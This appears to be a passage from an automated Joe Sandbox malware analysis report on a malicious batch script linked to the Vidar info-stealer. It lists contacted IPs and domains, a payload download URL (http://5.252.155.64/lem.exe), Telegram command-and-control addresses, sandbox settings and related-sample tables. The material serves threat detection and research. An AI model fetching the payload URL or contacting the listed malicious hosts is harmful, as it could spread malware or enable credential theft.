                                                                                                                                                                                                                https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://anglebug.com/7604chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://5.252.powershell.exe, 00000009.00000002.2403561813.0000025480182000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://5.252.155.64/lem.exeUSERDOMAIN=ENGchrome.exe, 00000020.00000003.3171987498.0000027410850000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3172472805.0000027410855000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://anglebug.com/7761chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://ogs.google.com/widget/app/so?eom=1chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://anglebug.com/7760chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoInf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3227248252.00005B38030C4000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://5.252.155.tasklist.exe, 00000011.00000002.2545055640.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2544304213.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2544455277.00000000031EC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            http://anglebug.com/5901chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://anglebug.com/3965chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                2.16.158.176
                                                                                                                                                                                                                                		unknownEuropean Union
                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                149.154.167.99
                                                                                                                                                                                                                                		t.meUnited Kingdom
                                                                                                                                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                5.252.155.64
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		49981WORLDSTREAMNLtrue
                                                                                                                                                                                                                                18.165.220.66
                                                                                                                                                                                                                                		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                162.159.61.3
                                                                                                                                                                                                                                		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                142.250.181.68
                                                                                                                                                                                                                                		www.google.comUnited States
                                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                                188.245.216.205
                                                                                                                                                                                                                                		bijutr.shopIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                		16322PARSONLINETehran-IRANIRfalse
                                                                                                                                                                                                                                142.250.181.65
                                                                                                                                                                                                                                		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                		unknownReserved
                                                                                                                                                                                                                                		unknownunknownfalse
                                                                                                                                                                                                                                2.16.158.83
                                                                                                                                                                                                                                		unknownEuropean Union
                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                                Private

                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                192.168.2.6
                                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1581178
                                                                                                                                                                                                                                Start date and time:2024-12-27 07:08:11 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 8m 34s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:45
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:skript.bat
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winBAT@91/168@25/12
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 50%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 98%
                                                                                                                                                                                                                                • Number of executed functions: 93
                                                                                                                                                                                                                                • Number of non-executed functions: 290
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .bat

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.223.35.26, 192.229.221.95, 217.20.58.99, 20.3.187.198, 23.218.208.109, 20.74.47.205, 172.217.19.227, 64.233.161.84, 172.217.19.238, 172.217.17.46, 172.217.21.35, 142.250.181.106, 142.250.181.74, 142.250.181.138, 172.217.17.74, 172.217.19.202, 172.217.19.10, 142.250.181.10, 172.217.19.234, 172.217.19.170, 172.217.17.42, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.181.142, 13.107.6.158, 13.87.96.169, 23.32.238.138, 2.19.198.56, 2.16.168.122, 2.16.168.113, 95.100.135.16, 95.100.135.121, 95.100.135.8, 95.100.135.113, 95.100.135.131, 95.100.135.107, 95.100.135.130, 95.100.135.122, 95.100.135.128, 2.16.158.27, 2.16.158.50, 2.16.158.73, 2.16.158.33, 2.16.158.43, 2.16.158.192, 2.16.158.26, 2.16.158.35, 2.16.158.34, 13.74.129.1, 204.79.197.237, 13.107.21.237, 23.32.238.163, 142.251.40.163, 142.250.176.195, 142.251.40.227, 142.250.80.67, 142.251.41.3, 142.250.65.163, 142.250.65.195, 40.126.53.10, 13.107.246.63, 4.245.163.56, 173.222.162.64, 150.171.2
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, tse1.mm.bing.net, clientservices.googleapis.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, clients.l.google.com, iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net,
                                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6716 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7456 because it is empty
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                01:09:09API Interceptor59x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                01:09:40API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                01:09:44API Interceptor1x Sleep call for process: putt.exe modified
                                                                                                                                                                                                                                01:10:27API Interceptor3x Sleep call for process: Inf.com modified

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                2.16.158.176http://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                  http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                  http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                  http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                  http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                  http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • telegram.org/?setln=pl
                                                                                                                                                                                                                                  http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                  http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • telegram.dog/
                                                                                                                                                                                                                                  LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                  • t.me/cinoshibot
                                                                                                                                                                                                                                  jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                  • t.me/cinoshibot
                                                                                                                                                                                                                                  5.252.155.64script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 5.252.155.64/lem.exe
                                                                                                                                                                                                                                  18.165.220.66file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    Scan_19112024_people_power_press.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                        remi.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                              https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    t.melem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    chrome.cloudflare-dns.comlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                    WRD1792.docx.docGet hashmaliciousDynamerBrowse
                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                    HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                    PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                    https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                    ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                    SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                    SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                    https://liladelman.com/rental/1218-west-side-road-block-island/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                    Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                    bijutr.shoplem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    ssl.bingadsedgeextension-prod-europe.azurewebsites.netlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                    HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                    PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                    ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                    nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                    gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                    ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 94.245.104.56
                                                                                                                                                                                                                                                    pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 94.245.104.56

                                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    TELEGRAMRUlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    WORLDSTREAMNLscript.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 5.252.155.64
                                                                                                                                                                                                                                                    nsharm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 178.132.3.26
                                                                                                                                                                                                                                                    Opdxdyeul.exeGet hashmaliciousSystemBCBrowse
                                                                                                                                                                                                                                                    • 178.132.2.10
                                                                                                                                                                                                                                                    spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 45.131.4.124
                                                                                                                                                                                                                                                    Xeno Executor.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                    • 5.252.155.28
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, CredGrabber, LummaC Stealer, Meduza Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    • 5.252.155.28
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                    • 5.252.155.28
                                                                                                                                                                                                                                                    spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                    • 213.108.199.252
                                                                                                                                                                                                                                                    https://kbprinters.com/serviciodecorreo/loginGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 217.23.10.192
                                                                                                                                                                                                                                                    Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 194.88.105.30
                                                                                                                                                                                                                                                    AKAMAI-ASN1EUlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 23.209.72.40
                                                                                                                                                                                                                                                    z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    AiaStwRBdI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    HJVzgKyC0y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    rUfr2hQGOb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    YhF4vhbnMW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    B8NcU4mckY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                    k6olCJyvIj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 23.55.153.106

                                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    6271f898ce5be7dd52b0fc260d0662b3GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 150.171.27.10
                                                                                                                                                                                                                                                    NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 150.171.27.10
                                                                                                                                                                                                                                                    L82esnUTxK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 150.171.27.10
                                                                                                                                                                                                                                                    MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 150.171.27.10
                                                                                                                                                                                                                                                    MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 150.171.27.10
                                                                                                                                                                                                                                                    SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 150.171.27.10
                                                                                                                                                                                                                                                    QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                    • 150.171.27.10
                                                                                                                                                                                                                                                    https://registry.paratext.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 150.171.27.10
                                                                                                                                                                                                                                                    Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 150.171.27.10
                                                                                                                                                                                                                                                    R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 150.171.27.10
                                                                                                                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0emsgde.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                    • 20.198.118.190
                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                    6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                    • 20.198.118.190
                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                    https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 20.198.118.190
                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                    ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 20.198.118.190
                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                    GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 20.198.118.190
                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                    TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 20.198.118.190
                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                    Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 20.198.118.190
                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                    ciwa.mp4.htaGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 20.198.118.190
                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                    INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 20.198.118.190
                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19yoda.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
